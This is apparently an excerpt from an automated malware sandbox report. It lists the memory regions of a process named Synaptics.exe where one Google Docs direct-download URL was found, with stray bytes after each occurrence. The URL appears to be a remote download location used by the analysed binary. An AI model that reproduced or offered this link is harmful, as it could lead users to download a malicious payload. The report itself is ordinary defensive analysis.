                              Source: Synaptics.exe, 00000003.00000002.1443067594.00000000053FE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C72000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4P
                              Source: Synaptics.exe, 00000014.00000002.2140164000.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download4T
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download5:.
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download6
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download7g8
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C72000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8
                              Source: Synaptics.exe, 00000014.00000002.2151061747.000000000E2BE000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download80
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8;-
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download8Pm
                              Source: Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9.
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download96
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9;GX
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download9g
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C7F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1977210353.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:/F
                              Source: Synaptics.exe, 00000003.00000002.1441338159.000000000063D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download:s
                              Source: Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;1
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;?
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download;f4
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=9
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=Qj
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download=f
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?e0
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadA
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAP
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadAd
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C7F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1977210353.0000000004C82000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadB
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadBQ
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadC9T
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C72000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadD1
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDMndM
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadDP
                              Source: Synaptics.exe, 00000014.00000003.1976493494.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017995324.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.00000000007F4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadE;
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadEV
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadF:S
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadG/3
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGgh
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadGxuZVL
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976029257.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145019297.0000000007A3E000.00000004.00000010.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C72000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2141980408.0000000004C5E000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadH
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadHWpT
                              Source: Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI
                              Source: Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadI/
                              Source: Synaptics.exe, 00000014.00000002.2140164000.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIK
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadIgC
                              Source: Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1442035103.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935661100.0000000004C7F000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140924392.0000000002490000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004C7C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJ6
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadJP
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2140164000.000000000073E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FF8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadK
                              Source: Synaptics.exe, 00000014.00000002.2151463286.000000000EBC0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKfd
                              Source: Synaptics.exe, 00000003.00000002.1443067594.0000000005481000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadKw4
                              Source: Synaptics.exe, 00000003.00000002.1441338159.0000000000717000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1446731024.00000000072BC000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2018131759.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1976029257.0000000007EA3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004C60000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadL0
                              Source: Synaptics.exe, 00000014.00000002.2152064699.000000000EC51000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLSg
                              Source: Synaptics.exe, 00000014.00000002.2140164000.0000000000787000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadLT
                              Source: Synaptics.exe, 00000003.00000002.1443067594.00000000053D9000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.0000000007160000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadM:F
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMQ
                              Source: Synaptics.exe, 00000014.00000002.2145229675.0000000007E3E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadMfO
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CEE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN
                              Source: Synaptics.exe, 00000014.00000002.2146834309.0000000007FEC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadN9
                              Source: Synaptics.exe, 00000014.00000002.2142028960.0000000004D36000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNM
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNV
                              Source: Synaptics.exe, 00000003.00000002.1441338159.00000000006C4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1445445710.000000000720D000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2145760240.0000000007EFF000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.2017353207.0000000007F17000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO
                              Source: Synaptics.exe, 00000014.00000003.1976684823.0000000004CE3000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000003.1935043043.0000000004CCD000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000014.00000002.2142028960.0000000004CE1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadO.;
                              Source: Synaptics.exe, 00000003.00000003.1316708703.000000000543A000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1443067594.0000000005442000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadOQ
